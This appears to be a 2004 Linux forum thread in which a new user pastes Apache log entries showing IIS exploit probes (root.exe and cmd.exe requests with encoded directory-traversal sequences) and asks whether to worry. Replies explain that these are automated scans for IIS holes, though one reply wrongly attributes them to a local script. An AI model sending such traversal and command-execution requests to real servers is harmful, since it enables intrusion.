Help answer threads with 0 replies.
Go Back > Forums > Linux Forums > Linux - Newbie
User Name
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!


  Search this Thread
Old 01-26-2004, 03:11 PM   #1
Registered: Jan 2004
Location: Canada
Posts: 68

Rep: Reputation: 15
should i be concerned

this is a log from my apache logs. - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 - - [26/Jan/2004:02:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297 - - [26/Jan/2004:02:19:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 - - [26/Jan/2004:02:19:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 - - [26/Jan/2004:02:20:03 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 - - [26/Jan/2004:02:20:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 - - [26/Jan/2004:02:20:09 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354 - - [26/Jan/2004:02:20:12 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 - - [26/Jan/2004:02:20:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311 - - [26/Jan/2004:02:20:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311 - - [26/Jan/2004:02:20:38 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 - - [26/Jan/2004:02:20:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321

should i be concerned that someone is 'trying' to find what could be important files, if this were a windows machine.

what constituts as something i should take action towards? this guys not too bright obviously.. but still.. does snooping around like this happen often?

other question.. can i block my own ip from being logged? as 80% or more of the log is either my cable IP, eth0 IP or loopback's IP.. so it would be nice if i just saw what other people were doing.
Old 01-26-2004, 03:25 PM   #2
Registered: Oct 2002
Location: Michigan
Distribution: Slackware Linux 10.0
Posts: 289

Rep: Reputation: 30
It doesnt look like someone is snooping around your system. The reason why I say this is because it looks like there is access to a scripts directory through your web server setup. A script might be executing cmd.exe to run correctly. I'm not sure what software your using as your web server, but to my knowledge, I dont believe you can omit your own IP address from a log.
Old 01-26-2004, 03:35 PM   #3
Registered: Aug 2003
Location: Arizona
Distribution: Gentoo
Posts: 142

Rep: Reputation: 15
No, you really don't need to be worried about it. They're scanning for IIS exploits, they really don't apply to you
I run a webserver and get that alot, its mostly just script-kiddies looking around for an *easy hack*. Maybe jot down the ip that the scan came from and keep an eye out for other scans from the same general IP address. If it gets to be a problem bring it up w/ the ISP.
If you start seeing apache specific exploits then you should start being a little more worried. Just keep an eye on your secure and message log files for unusal stuff.

All in all your fine tho. You'll probably see alot more of those.
Old 01-26-2004, 03:40 PM   #4
Registered: Jan 2004
Location: Canada
Posts: 68

Original Poster
Rep: Reputation: 15
ok thanks..

although i don't have a scripts folder within my webpage directory.. so that's why i was wondering why they're be trying to look for something in there..

i am using apache2 on fedora linux.


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Similar Threads
Thread Thread Starter Forum Replies Last Post
New and concerned- FW question aquaboot Linux - Security 3 08-17-2005 06:46 PM
should i be concerned (defragment?)... marsques Slackware 6 01-13-2005 01:10 AM
Should I be concerned? LinuxBAH Linux - Security 8 02-07-2004 01:24 PM
newbie a bit concerned amby Mandriva 4 01-13-2004 03:42 PM
Concerned about delete partition ajmacedo Linux - Newbie 3 10-28-2003 04:44 PM > Forums > Linux Forums > Linux - Newbie

All times are GMT -5. The time now is 01:36 AM.

Main Menu
Write for LQ is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration